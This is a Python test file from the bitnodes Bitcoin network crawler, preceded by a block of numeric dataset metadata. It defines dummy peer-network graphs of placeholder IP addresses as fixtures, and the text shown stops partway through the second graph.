| 0.891275
| 0.890604
| 0.890604
| 0.882774
| 0.8783
| 0
| 0.026465
| 0.241136
| 7,220
| 232
| 98
| 31.12069
| 0.789378
| 0.184072
| 0
| 0.884058
| 0
| 0
| 0.0959
| 0
| 0
| 0
| 0
| 0
| 0.210145
| 1
| 0.028986
| false
| 0
| 0.028986
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8ca298c4f88cf2dcb1cfbf6c63b7525d80c2c849
| 25,052
|
py
|
Python
|
tests.py
|
msund/bitnodes
|
3dff0d0f6718ed6748130cb3adcfb04b4c55b467
|
[
"MIT"
] | 1
|
2022-02-28T14:40:45.000Z
|
2022-02-28T14:40:45.000Z
|
tests.py
|
msund/bitnodes
|
3dff0d0f6718ed6748130cb3adcfb04b4c55b467
|
[
"MIT"
] | null | null | null |
tests.py
|
msund/bitnodes
|
3dff0d0f6718ed6748130cb3adcfb04b4c55b467
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# tests.py - Dummy data and tests for bitnodes.
#
# Copyright (c) 2013 Addy Yeow Chin Heng <ayeowch@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
Dummy data and tests for bitnodes.
"""
import time
"""
Graph layout for DUMMY_NETWORK_A:
1.1.1.1
2.2.2.2
4.4.4.4
10.10.10.10
11.11.11.11
13.13.13.13
14.14.14.14
15.15.15.15
16.16.16.16
22.22.22.22
17.17.17.17
18.18.18.18
4.4.4.4
5.5.5.5
19.19.19.19
20.20.20.20
21.21.21.21
12.12.12.12
3.3.3.3
5.5.5.5
7.7.7.7
9.9.9.9
8.8.8.8
6.6.6.6
16.16.16.16
"""
DUMMY_NETWORK_A = {
"1.1.1.1": [{"ip": "2.2.2.2"}, {"ip": "3.3.3.3"}, {"ip": "16.16.16.16"}, ],
"2.2.2.2": [{"ip": "4.4.4.4"}, ],
"3.3.3.3": [{"ip": "5.5.5.5"}, {"ip": "6.6.6.6"}, ],
"4.4.4.4": [{"ip": "10.10.10.10"}, {"ip": "11.11.11.11"}, {"ip": "12.12.12.12"}, ],
"5.5.5.5": [{"ip": "7.7.7.7"}, {"ip": "8.8.8.8"}, ],
"6.6.6.6": [],
"7.7.7.7": [{"ip": "9.9.9.9"}, ],
"8.8.8.8": [],
"9.9.9.9": [],
"10.10.10.10": [],
"11.11.11.11": [{"ip": "13.13.13.13"}, ],
"12.12.12.12": [],
"13.13.13.13": [{"ip": "14.14.14.14"}, ],
"14.14.14.14": [{"ip": "15.15.15.15"}, {"ip": "18.18.18.18"}, {"ip": "19.19.19.19"}, {"ip": "20.20.20.20"}, ],
"15.15.15.15": [{"ip": "16.16.16.16"}, {"ip": "17.17.17.17"}, ],
"16.16.16.16": [{"ip": "22.22.22.22"}, ],
"17.17.17.17": [],
"18.18.18.18": [{"ip": "4.4.4.4"}, {"ip": "5.5.5.5"}, ],
"19.19.19.19": [],
"20.20.20.20": [{"ip": "21.21.21.21"}, ],
"21.21.21.21": [],
"22.22.22.22": [],
}
DUMMY_SEEDS_A = {
1: "1.1.1.1",
2: "2.2.2.2",
3: "3.3.3.3",
4: "4.4.4.4",
5: "5.5.5.5",
6: "6.6.6.6",
}
"""
DUMMY_NETWORK_B was created using gephi's random graph generation with
100 nodes and 511 edges.
"""
DUMMY_NETWORK_B = {
"5.2.7.4": [{"ip": "5.2.6.2"}, {"ip": "5.2.8.8"}, {"ip": "5.2.0.5"}, {"ip": "5.2.1.0"}, {"ip": "5.2.0.1"}, {"ip": "5.1.9.9"}, ],
"5.2.7.5": [{"ip": "5.2.7.9"}, {"ip": "5.2.2.8"}, {"ip": "5.2.9.1"}, {"ip": "5.2.7.1"}, {"ip": "5.2.7.3"}, {"ip": "5.2.0.7"}, {"ip": "5.2.0.4"}, {"ip": "5.2.1.7"}, {"ip": "5.2.4.7"}, {"ip": "5.1.9.7"}, {"ip": "5.2.5.4"}, {"ip": "5.2.0.8"}, ],
"5.2.7.6": [{"ip": "5.2.2.5"}, {"ip": "5.2.3.3"}, {"ip": "5.2.7.8"}, {"ip": "5.2.2.8"}, {"ip": "5.2.1.0"}, {"ip": "5.2.4.5"}, {"ip": "5.2.5.6"}, {"ip": "5.2.5.4"}, {"ip": "5.2.2.1"}, ],
"5.2.7.7": [{"ip": "5.2.2.5"}, {"ip": "5.2.3.3"}, {"ip": "5.2.3.7"}, {"ip": "5.2.6.8"}, {"ip": "5.2.8.4"}, {"ip": "5.2.2.6"}, {"ip": "5.2.4.2"}, {"ip": "5.2.8.6"}, {"ip": "5.2.0.5"}, {"ip": "5.2.0.3"}, {"ip": "5.2.0.0"}, {"ip": "5.2.5.0"}, ],
"5.2.7.0": [{"ip": "5.2.2.5"}, {"ip": "5.2.3.2"}, {"ip": "5.2.4.5"}, {"ip": "5.2.8.3"}, {"ip": "5.2.4.2"}, {"ip": "5.2.1.7"}, {"ip": "5.2.0.0"}, {"ip": "5.1.9.9"}, {"ip": "5.2.5.6"}, ],
"5.2.7.1": [{"ip": "5.2.6.0"}, {"ip": "5.2.6.5"}, {"ip": "5.2.1.6"}, {"ip": "5.2.2.0"}, {"ip": "5.2.2.1"}, {"ip": "5.2.7.5"}, {"ip": "5.2.3.8"}, {"ip": "5.2.8.5"}, {"ip": "5.2.8.2"}, {"ip": "5.1.9.5"}, {"ip": "5.2.0.1"}, {"ip": "5.2.5.0"}, ],
"5.2.7.2": [{"ip": "5.2.3.2"}, {"ip": "5.2.2.1"}, {"ip": "5.2.2.3"}, {"ip": "5.2.3.9"}, {"ip": "5.2.8.2"}, {"ip": "5.2.5.6"}, {"ip": "5.2.4.8"}, {"ip": "5.2.5.0"}, ],
"5.2.7.3": [{"ip": "5.2.6.0"}, {"ip": "5.2.2.5"}, {"ip": "5.2.8.8"}, {"ip": "5.2.3.6"}, {"ip": "5.2.7.5"}, {"ip": "5.2.8.7"}, {"ip": "5.2.8.4"}, {"ip": "5.2.8.3"}, {"ip": "5.2.8.0"}, {"ip": "5.2.4.3"}, {"ip": "5.2.1.7"}, {"ip": "5.2.5.8"}, {"ip": "5.2.5.4"}, ],
"5.2.7.8": [{"ip": "5.2.3.2"}, {"ip": "5.2.2.0"}, {"ip": "5.2.6.8"}, {"ip": "5.2.7.6"}, {"ip": "5.2.1.3"}, {"ip": "5.2.8.6"}, {"ip": "5.2.4.1"}, {"ip": "5.2.4.6"}, {"ip": "5.2.1.6"}, {"ip": "5.2.1.4"}, ],
"5.2.7.9": [{"ip": "5.2.6.3"}, {"ip": "5.2.3.9"}, {"ip": "5.2.3.8"}, {"ip": "5.2.4.5"}, {"ip": "5.2.1.2"}, {"ip": "5.2.7.5"}, {"ip": "5.2.5.8"}, {"ip": "5.2.5.6"}, ],
"5.2.6.7": [{"ip": "5.2.2.7"}, {"ip": "5.2.6.5"}, {"ip": "5.2.8.7"}, {"ip": "5.2.8.2"}, {"ip": "5.1.9.2"}, {"ip": "5.2.1.4"}, {"ip": "5.1.9.8"}, {"ip": "5.2.1.9"}, {"ip": "5.2.0.9"}, ],
"5.2.6.6": [{"ip": "5.2.6.3"}, {"ip": "5.2.8.9"}, {"ip": "5.2.8.7"}, {"ip": "5.2.8.1"}, {"ip": "5.2.4.5"}, {"ip": "5.2.1.8"}, {"ip": "5.2.5.3"}, ],
"5.2.6.5": [{"ip": "5.2.2.0"}, {"ip": "5.2.6.7"}, {"ip": "5.2.9.1"}, {"ip": "5.2.8.5"}, {"ip": "5.2.7.1"}, {"ip": "5.2.0.6"}, {"ip": "5.1.9.3"}, {"ip": "5.2.0.0"}, {"ip": "5.2.5.5"}, {"ip": "5.2.0.9"}, ],
"5.2.6.4": [{"ip": "5.2.2.5"}, {"ip": "5.2.2.3"}, {"ip": "5.2.1.0"}, {"ip": "5.2.8.3"}, {"ip": "5.2.4.1"}, {"ip": "5.2.4.6"}, {"ip": "5.2.4.8"}, {"ip": "5.2.5.2"}, ],
"5.2.6.3": [{"ip": "5.2.7.9"}, {"ip": "5.2.6.6"}, {"ip": "5.2.8.9"}, {"ip": "5.2.8.5"}, {"ip": "5.2.0.7"}, {"ip": "5.2.1.1"}, {"ip": "5.1.9.5"}, {"ip": "5.2.1.5"}, {"ip": "5.2.1.8"}, {"ip": "5.2.5.2"}, {"ip": "5.2.0.8"}, {"ip": "5.2.4.7"}, ],
"5.2.6.2": [{"ip": "5.2.2.5"}, {"ip": "5.2.2.6"}, {"ip": "5.2.8.6"}, {"ip": "5.2.7.4"}, {"ip": "5.2.8.5"}, {"ip": "5.1.9.4"}, {"ip": "5.2.0.3"}, {"ip": "5.2.5.6"}, ],
"5.2.6.1": [{"ip": "5.2.3.0"}, {"ip": "5.2.2.2"}, {"ip": "5.2.8.7"}, {"ip": "5.2.4.5"}, {"ip": "5.2.5.5"}, {"ip": "5.2.0.8"}, ],
"5.2.6.0": [{"ip": "5.2.3.7"}, {"ip": "5.2.8.2"}, {"ip": "5.2.8.4"}, {"ip": "5.2.9.0"}, {"ip": "5.2.7.1"}, {"ip": "5.2.7.3"}, {"ip": "5.2.8.1"}, {"ip": "5.1.9.2"}, ],
"5.2.6.9": [{"ip": "5.2.2.4"}, {"ip": "5.2.1.4"}, {"ip": "5.2.2.6"}, {"ip": "5.2.2.5"}, {"ip": "5.2.8.9"}, {"ip": "5.2.2.8"}, {"ip": "5.2.9.0"}, {"ip": "5.2.8.2"}, {"ip": "5.2.8.0"}, {"ip": "5.1.9.3"}, {"ip": "5.2.0.2"}, {"ip": "5.1.9.5"}, {"ip": "5.2.8.7"}, {"ip": "5.2.2.3"}, ],
"5.2.6.8": [{"ip": "5.2.3.0"}, {"ip": "5.2.3.3"}, {"ip": "5.2.2.7"}, {"ip": "5.2.7.8"}, {"ip": "5.2.2.3"}, {"ip": "5.2.8.4"}, {"ip": "5.2.7.7"}, {"ip": "5.2.8.2"}, {"ip": "5.2.0.6"}, {"ip": "5.2.0.7"}, {"ip": "5.2.1.6"}, {"ip": "5.2.1.5"}, {"ip": "5.1.9.9"}, {"ip": "5.2.9.1"}, {"ip": "5.2.5.2"}, {"ip": "5.2.5.1"}, {"ip": "5.2.4.7"}, ],
"5.2.5.2": [{"ip": "5.2.3.0"}, {"ip": "5.2.6.3"}, {"ip": "5.2.6.4"}, {"ip": "5.2.8.8"}, {"ip": "5.2.6.8"}, {"ip": "5.2.8.4"}, {"ip": "5.2.9.0"}, {"ip": "5.2.8.3"}, {"ip": "5.2.8.0"}, {"ip": "5.2.1.1"}, {"ip": "5.1.9.8"}, {"ip": "5.2.2.0"}, {"ip": "5.2.1.8"}, ],
"5.2.5.3": [{"ip": "5.2.3.0"}, {"ip": "5.2.2.7"}, {"ip": "5.2.2.1"}, {"ip": "5.2.6.6"}, {"ip": "5.2.8.0"}, {"ip": "5.2.4.5"}, {"ip": "5.2.4.9"}, ],
"5.2.5.0": [{"ip": "5.2.2.8"}, {"ip": "5.2.7.7"}, {"ip": "5.2.7.1"}, {"ip": "5.2.7.2"}, {"ip": "5.1.9.5"}, {"ip": "5.2.4.4"}, {"ip": "5.2.1.6"}, ],
"5.2.5.1": [{"ip": "5.1.9.6"}, {"ip": "5.2.8.8"}, {"ip": "5.2.3.6"}, {"ip": "5.2.6.8"}, {"ip": "5.1.9.2"}, {"ip": "5.2.1.0"}, {"ip": "5.2.1.5"}, {"ip": "5.1.9.7"}, {"ip": "5.1.9.8"}, {"ip": "5.2.5.4"}, ],
"5.2.5.6": [{"ip": "5.2.3.1"}, {"ip": "5.2.6.2"}, {"ip": "5.2.7.6"}, {"ip": "5.2.7.9"}, {"ip": "5.2.8.6"}, {"ip": "5.2.3.8"}, {"ip": "5.2.9.0"}, {"ip": "5.2.7.0"}, {"ip": "5.2.2.9"}, {"ip": "5.2.7.2"}, {"ip": "5.2.4.2"}, {"ip": "5.2.1.1"}, {"ip": "5.2.8.0"}, {"ip": "5.2.8.7"}, {"ip": "5.2.8.1"}, {"ip": "5.1.9.7"}, {"ip": "5.2.1.6"}, ],
"5.2.5.7": [{"ip": "5.2.8.8"}, {"ip": "5.2.8.6"}, {"ip": "5.2.8.0"}, {"ip": "5.2.0.6"}, {"ip": "5.2.0.2"}, {"ip": "5.2.4.5"}, {"ip": "5.2.4.8"}, ],
"5.2.5.4": [{"ip": "5.2.3.1"}, {"ip": "5.1.9.6"}, {"ip": "5.2.2.2"}, {"ip": "5.2.7.5"}, {"ip": "5.2.7.6"}, {"ip": "5.2.7.3"}, {"ip": "5.2.4.3"}, {"ip": "5.2.4.7"}, {"ip": "5.2.0.0"}, {"ip": "5.2.1.8"}, {"ip": "5.2.5.1"}, ],
"5.2.5.5": [{"ip": "5.2.3.0"}, {"ip": "5.2.3.2"}, {"ip": "5.2.6.5"}, {"ip": "5.2.2.3"}, {"ip": "5.2.8.6"}, {"ip": "5.2.6.1"}, {"ip": "5.2.8.3"}, {"ip": "5.2.8.1"}, {"ip": "5.2.1.7"}, {"ip": "5.2.0.9"}, ],
"5.2.5.8": [{"ip": "5.2.7.9"}, {"ip": "5.2.2.1"}, {"ip": "5.2.9.1"}, {"ip": "5.2.0.5"}, {"ip": "5.2.7.3"}, {"ip": "5.2.8.1"}, {"ip": "5.1.9.3"}, {"ip": "5.2.4.7"}, {"ip": "5.2.4.8"}, {"ip": "5.2.8.4"}, ],
"5.2.5.9": [{"ip": "5.2.2.4"}, {"ip": "5.2.3.1"}, {"ip": "5.2.3.2"}, {"ip": "5.2.8.4"}, {"ip": "5.2.0.6"}, {"ip": "5.2.1.2"}, {"ip": "5.2.0.3"}, ],
"5.2.4.9": [{"ip": "5.2.3.7"}, {"ip": "5.2.3.9"}, {"ip": "5.2.8.4"}, {"ip": "5.2.9.0"}, {"ip": "5.2.1.3"}, {"ip": "5.2.0.2"}, {"ip": "5.1.9.8"}, {"ip": "5.2.5.3"}, ],
"5.2.4.8": [{"ip": "5.2.2.0"}, {"ip": "5.2.8.6"}, {"ip": "5.2.1.4"}, {"ip": "5.2.7.2"}, {"ip": "5.2.5.8"}, {"ip": "5.2.5.7"}, {"ip": "5.2.6.4"}, ],
"5.2.4.5": [{"ip": "5.2.2.0"}, {"ip": "5.2.6.1"}, {"ip": "5.2.7.9"}, {"ip": "5.2.6.6"}, {"ip": "5.2.0.7"}, {"ip": "5.2.9.1"}, {"ip": "5.2.7.6"}, {"ip": "5.2.7.0"}, {"ip": "5.2.1.2"}, {"ip": "5.2.1.6"}, {"ip": "5.2.4.4"}, {"ip": "5.1.9.7"}, {"ip": "5.2.5.7"}, {"ip": "5.1.9.9"}, {"ip": "5.2.5.3"}, {"ip": "5.2.4.7"}, ],
"5.2.4.4": [{"ip": "5.2.3.6"}, {"ip": "5.2.9.1"}, {"ip": "5.2.8.0"}, {"ip": "5.2.8.1"}, {"ip": "5.2.4.2"}, {"ip": "5.2.4.5"}, {"ip": "5.1.9.8"}, {"ip": "5.2.5.0"}, ],
"5.2.4.7": [{"ip": "5.2.3.1"}, {"ip": "5.2.6.3"}, {"ip": "5.2.3.6"}, {"ip": "5.2.7.5"}, {"ip": "5.2.3.8"}, {"ip": "5.2.5.8"}, {"ip": "5.2.0.7"}, {"ip": "5.2.0.3"}, {"ip": "5.2.4.5"}, {"ip": "5.2.5.4"}, {"ip": "5.2.6.8"}, ],
"5.2.4.6": [{"ip": "5.2.3.3"}, {"ip": "5.2.6.4"}, {"ip": "5.2.7.8"}, {"ip": "5.2.2.6"}, {"ip": "5.1.9.7"}, {"ip": "5.2.2.0"}, ],
"5.2.4.1": [{"ip": "5.2.6.4"}, {"ip": "5.2.7.8"}, {"ip": "5.2.8.8"}, {"ip": "5.2.8.7"}, {"ip": "5.2.8.2"}, {"ip": "5.2.0.6"}, {"ip": "5.1.9.2"}, {"ip": "5.1.9.4"}, {"ip": "5.2.2.1"}, ],
"5.2.4.0": [{"ip": "5.2.1.7"}, {"ip": "5.2.1.1"}, {"ip": "5.2.8.7"}, {"ip": "5.2.0.2"}, {"ip": "5.2.0.9"}, ],
"5.2.4.3": [{"ip": "5.2.3.1"}, {"ip": "5.2.3.4"}, {"ip": "5.2.7.3"}, {"ip": "5.2.1.3"}, {"ip": "5.2.0.7"}, {"ip": "5.2.0.5"}, {"ip": "5.2.0.1"}, {"ip": "5.2.5.4"}, ],
"5.2.4.2": [{"ip": "5.2.3.2"}, {"ip": "5.2.2.0"}, {"ip": "5.2.4.4"}, {"ip": "5.2.8.4"}, {"ip": "5.2.7.0"}, {"ip": "5.1.9.2"}, {"ip": "5.1.9.4"}, {"ip": "5.2.0.0"}, {"ip": "5.2.5.6"}, {"ip": "5.2.7.7"}, {"ip": "5.2.0.9"}, ],
"5.2.3.8": [{"ip": "5.2.2.7"}, {"ip": "5.2.7.9"}, {"ip": "5.2.3.7"}, {"ip": "5.2.8.5"}, {"ip": "5.2.7.1"}, {"ip": "5.2.2.9"}, {"ip": "5.2.8.0"}, {"ip": "5.1.9.4"}, {"ip": "5.2.1.6"}, {"ip": "5.2.5.6"}, {"ip": "5.2.0.8"}, {"ip": "5.2.4.7"}, ],
"5.2.3.9": [{"ip": "5.2.3.1"}, {"ip": "5.2.3.0"}, {"ip": "5.2.7.9"}, {"ip": "5.2.2.1"}, {"ip": "5.2.9.0"}, {"ip": "5.2.7.2"}, {"ip": "5.2.8.1"}, {"ip": "5.2.4.9"}, ],
"5.2.3.0": [{"ip": "5.2.6.1"}, {"ip": "5.2.3.2"}, {"ip": "5.2.3.4"}, {"ip": "5.2.3.7"}, {"ip": "5.2.6.8"}, {"ip": "5.2.0.5"}, {"ip": "5.2.3.9"}, {"ip": "5.2.1.0"}, {"ip": "5.2.5.5"}, {"ip": "5.2.5.3"}, {"ip": "5.2.5.2"}, {"ip": "5.2.0.9"}, ],
"5.2.3.1": [{"ip": "5.2.3.5"}, {"ip": "5.2.8.8"}, {"ip": "5.2.8.9"}, {"ip": "5.2.3.9"}, {"ip": "5.2.8.4"}, {"ip": "5.2.8.2"}, {"ip": "5.2.4.3"}, {"ip": "5.2.1.1"}, {"ip": "5.2.4.7"}, {"ip": "5.2.5.9"}, {"ip": "5.2.1.4"}, {"ip": "5.2.5.6"}, {"ip": "5.2.5.4"}, ],
"5.2.3.2": [{"ip": "5.2.3.0"}, {"ip": "5.1.9.6"}, {"ip": "5.2.3.6"}, {"ip": "5.2.7.0"}, {"ip": "5.2.7.2"}, {"ip": "5.2.4.2"}, {"ip": "5.2.0.5"}, {"ip": "5.2.5.9"}, {"ip": "5.2.5.5"}, {"ip": "5.2.7.8"}, ],
"5.2.3.3": [{"ip": "5.2.3.5"}, {"ip": "5.2.0.1"}, {"ip": "5.2.2.2"}, {"ip": "5.2.6.8"}, {"ip": "5.2.7.7"}, {"ip": "5.2.7.6"}, {"ip": "5.2.0.6"}, {"ip": "5.1.9.2"}, {"ip": "5.2.4.6"}, {"ip": "5.2.1.6"}, {"ip": "5.1.9.7"}, {"ip": "5.1.9.8"}, ],
"5.2.3.4": [{"ip": "5.2.3.0"}, {"ip": "5.2.2.3"}, {"ip": "5.2.8.2"}, {"ip": "5.2.8.3"}, {"ip": "5.2.8.1"}, {"ip": "5.2.4.3"}, {"ip": "5.1.9.7"}, {"ip": "5.2.1.8"}, ],
"5.2.3.5": [{"ip": "5.2.3.1"}, {"ip": "5.2.3.3"}, {"ip": "5.2.2.0"}, {"ip": "5.2.3.7"}, {"ip": "5.2.0.3"}, {"ip": "5.1.9.5"}, ],
"5.2.3.6": [{"ip": "5.2.3.2"}, {"ip": "5.2.7.3"}, {"ip": "5.2.1.3"}, {"ip": "5.2.1.0"}, {"ip": "5.2.4.7"}, {"ip": "5.2.4.4"}, {"ip": "5.2.5.1"}, ],
"5.2.3.7": [{"ip": "5.2.6.0"}, {"ip": "5.2.3.0"}, {"ip": "5.2.2.6"}, {"ip": "5.2.3.5"}, {"ip": "5.2.2.3"}, {"ip": "5.2.3.8"}, {"ip": "5.2.7.7"}, {"ip": "5.2.9.0"}, {"ip": "5.2.0.3"}, {"ip": "5.1.9.7"}, {"ip": "5.2.4.9"}, ],
"5.2.2.9": [{"ip": "5.2.2.3"}, {"ip": "5.2.8.6"}, {"ip": "5.2.3.8"}, {"ip": "5.2.8.0"}, {"ip": "5.2.0.7"}, {"ip": "5.2.1.0"}, {"ip": "5.2.1.7"}, {"ip": "5.1.9.5"}, {"ip": "5.2.5.6"}, ],
"5.2.2.8": [{"ip": "5.2.8.9"}, {"ip": "5.2.7.5"}, {"ip": "5.2.6.9"}, {"ip": "5.2.7.6"}, {"ip": "5.2.8.0"}, {"ip": "5.2.1.2"}, {"ip": "5.2.1.1"}, {"ip": "5.1.9.4"}, {"ip": "5.1.9.6"}, {"ip": "5.1.9.9"}, {"ip": "5.2.0.2"}, {"ip": "5.2.5.0"}, ],
"5.2.2.3": [{"ip": "5.2.2.5"}, {"ip": "5.2.2.7"}, {"ip": "5.2.6.4"}, {"ip": "5.2.3.4"}, {"ip": "5.2.3.7"}, {"ip": "5.2.6.8"}, {"ip": "5.2.6.9"}, {"ip": "5.2.9.0"}, {"ip": "5.2.2.9"}, {"ip": "5.2.7.2"}, {"ip": "5.1.9.4"}, {"ip": "5.2.5.5"}, {"ip": "5.2.0.9"}, ],
"5.2.2.2": [{"ip": "5.2.6.1"}, {"ip": "5.2.3.3"}, {"ip": "5.2.2.0"}, {"ip": "5.2.8.4"}, {"ip": "5.2.0.2"}, {"ip": "5.2.5.4"}, {"ip": "5.2.0.8"}, {"ip": "5.2.0.9"}, ],
"5.2.2.1": [{"ip": "5.2.2.7"}, {"ip": "5.2.7.6"}, {"ip": "5.2.3.9"}, {"ip": "5.2.9.1"}, {"ip": "5.2.5.8"}, {"ip": "5.2.7.1"}, {"ip": "5.2.7.2"}, {"ip": "5.2.1.2"}, {"ip": "5.2.4.1"}, {"ip": "5.1.9.4"}, {"ip": "5.2.0.1"}, {"ip": "5.2.1.8"}, {"ip": "5.2.5.3"}, ],
"5.2.2.0": [{"ip": "5.2.3.5"}, {"ip": "5.2.7.8"}, {"ip": "5.2.2.2"}, {"ip": "5.2.9.1"}, {"ip": "5.2.4.5"}, {"ip": "5.2.7.1"}, {"ip": "5.2.4.2"}, {"ip": "5.2.0.5"}, {"ip": "5.2.4.6"}, {"ip": "5.1.9.5"}, {"ip": "5.2.0.1"}, {"ip": "5.2.4.8"}, {"ip": "5.2.5.2"}, {"ip": "5.2.6.5"}, ],
"5.2.2.7": [{"ip": "5.2.2.6"}, {"ip": "5.2.9.0"}, {"ip": "5.2.2.1"}, {"ip": "5.2.2.3"}, {"ip": "5.2.6.8"}, {"ip": "5.2.3.8"}, {"ip": "5.2.9.1"}, {"ip": "5.2.6.7"}, {"ip": "5.2.1.1"}, {"ip": "5.1.9.8"}, {"ip": "5.2.5.3"}, ],
"5.2.2.6": [{"ip": "5.2.6.2"}, {"ip": "5.2.2.7"}, {"ip": "5.2.3.7"}, {"ip": "5.2.6.9"}, {"ip": "5.2.7.7"}, {"ip": "5.2.1.3"}, {"ip": "5.2.0.4"}, {"ip": "5.1.9.4"}, {"ip": "5.1.9.5"}, {"ip": "5.2.1.4"}, {"ip": "5.2.4.6"}, {"ip": "5.2.9.1"}, {"ip": "5.2.0.8"}, ],
"5.2.2.5": [{"ip": "5.2.1.4"}, {"ip": "5.2.6.2"}, {"ip": "5.2.6.4"}, {"ip": "5.2.2.3"}, {"ip": "5.2.6.9"}, {"ip": "5.2.7.7"}, {"ip": "5.2.7.6"}, {"ip": "5.2.7.0"}, {"ip": "5.2.8.0"}, {"ip": "5.2.0.5"}, {"ip": "5.1.9.4"}, {"ip": "5.2.7.3"}, {"ip": "5.1.9.7"}, ],
"5.2.2.4": [{"ip": "5.2.6.9"}, {"ip": "5.2.0.6"}, {"ip": "5.2.0.7"}, {"ip": "5.2.0.4"}, {"ip": "5.2.0.2"}, {"ip": "5.2.5.9"}, {"ip": "5.2.8.7"}, ],
"5.2.9.0": [{"ip": "5.2.6.0"}, {"ip": "5.2.2.7"}, {"ip": "5.2.3.7"}, {"ip": "5.2.2.3"}, {"ip": "5.2.3.9"}, {"ip": "5.2.6.9"}, {"ip": "5.2.8.3"}, {"ip": "5.2.0.5"}, {"ip": "5.2.1.4"}, {"ip": "5.2.5.6"}, {"ip": "5.2.1.9"}, {"ip": "5.2.4.9"}, {"ip": "5.2.5.2"}, {"ip": "5.2.0.8"}, ],
"5.2.9.1": [{"ip": "5.2.2.6"}, {"ip": "5.2.2.7"}, {"ip": "5.2.2.0"}, {"ip": "5.2.1.5"}, {"ip": "5.2.6.8"}, {"ip": "5.2.0.1"}, {"ip": "5.2.7.5"}, {"ip": "5.2.4.4"}, {"ip": "5.2.4.5"}, {"ip": "5.2.5.8"}, {"ip": "5.2.2.1"}, {"ip": "5.2.6.5"}, ],
"5.2.1.6": [{"ip": "5.2.3.3"}, {"ip": "5.2.7.8"}, {"ip": "5.2.6.8"}, {"ip": "5.2.3.8"}, {"ip": "5.2.1.4"}, {"ip": "5.2.7.1"}, {"ip": "5.2.8.6"}, {"ip": "5.2.0.4"}, {"ip": "5.1.9.3"}, {"ip": "5.2.0.0"}, {"ip": "5.2.4.5"}, {"ip": "5.1.9.8"}, {"ip": "5.2.5.6"}, {"ip": "5.2.1.8"}, {"ip": "5.1.9.7"}, {"ip": "5.2.0.8"}, {"ip": "5.2.5.0"}, ],
"5.2.1.7": [{"ip": "5.2.7.5"}, {"ip": "5.2.2.9"}, {"ip": "5.2.8.0"}, {"ip": "5.2.7.0"}, {"ip": "5.2.4.0"}, {"ip": "5.2.7.3"}, {"ip": "5.1.9.9"}, {"ip": "5.2.5.5"}, ],
"5.2.1.4": [{"ip": "5.2.3.1"}, {"ip": "5.2.2.5"}, {"ip": "5.2.2.6"}, {"ip": "5.2.7.8"}, {"ip": "5.2.6.7"}, {"ip": "5.2.8.7"}, {"ip": "5.2.8.4"}, {"ip": "5.2.9.0"}, {"ip": "5.2.8.1"}, {"ip": "5.2.1.6"}, {"ip": "5.2.6.9"}, {"ip": "5.1.9.9"}, {"ip": "5.2.4.8"}, ],
"5.2.1.5": [{"ip": "5.2.6.3"}, {"ip": "5.2.6.8"}, {"ip": "5.2.9.1"}, {"ip": "5.2.8.5"}, {"ip": "5.2.0.2"}, {"ip": "5.2.0.3"}, {"ip": "5.2.5.1"}, {"ip": "5.2.0.9"}, ],
"5.2.1.2": [{"ip": "5.2.7.9"}, {"ip": "5.2.2.1"}, {"ip": "5.2.8.6"}, {"ip": "5.2.2.8"}, {"ip": "5.2.1.3"}, {"ip": "5.2.0.2"}, {"ip": "5.2.5.9"}, {"ip": "5.2.4.5"}, ],
"5.2.1.3": [{"ip": "5.2.2.6"}, {"ip": "5.2.7.8"}, {"ip": "5.2.1.2"}, {"ip": "5.2.3.6"}, {"ip": "5.2.4.3"}, {"ip": "5.2.0.4"}, {"ip": "5.2.0.2"}, {"ip": "5.2.0.3"}, {"ip": "5.1.9.8"}, {"ip": "5.2.4.9"}, ],
"5.2.1.0": [{"ip": "5.2.3.0"}, {"ip": "5.2.7.6"}, {"ip": "5.2.6.4"}, {"ip": "5.2.3.6"}, {"ip": "5.2.7.4"}, {"ip": "5.2.8.5"}, {"ip": "5.2.2.9"}, {"ip": "5.2.0.1"}, {"ip": "5.1.9.7"}, {"ip": "5.2.5.1"}, ],
"5.2.1.1": [{"ip": "5.2.3.1"}, {"ip": "5.2.2.7"}, {"ip": "5.2.8.8"}, {"ip": "5.2.2.8"}, {"ip": "5.2.4.0"}, {"ip": "5.2.6.3"}, {"ip": "5.2.5.6"}, {"ip": "5.2.5.2"}, ],
"5.2.1.8": [{"ip": "5.2.6.3"}, {"ip": "5.2.3.4"}, {"ip": "5.2.6.6"}, {"ip": "5.2.8.5"}, {"ip": "5.2.0.2"}, {"ip": "5.2.1.6"}, {"ip": "5.1.9.4"}, {"ip": "5.2.5.4"}, {"ip": "5.2.5.2"}, {"ip": "5.2.2.1"}, ],
"5.2.1.9": [{"ip": "5.2.8.6"}, {"ip": "5.2.9.0"}, {"ip": "5.1.9.7"}, {"ip": "5.2.0.5"}, {"ip": "5.2.6.7"}, ],
"5.1.9.9": [{"ip": "5.2.6.8"}, {"ip": "5.2.7.4"}, {"ip": "5.2.8.4"}, {"ip": "5.2.4.5"}, {"ip": "5.2.2.8"}, {"ip": "5.2.7.0"}, {"ip": "5.2.0.4"}, {"ip": "5.2.1.7"}, {"ip": "5.2.1.4"}, {"ip": "5.1.9.7"}, {"ip": "5.2.0.8"}, ],
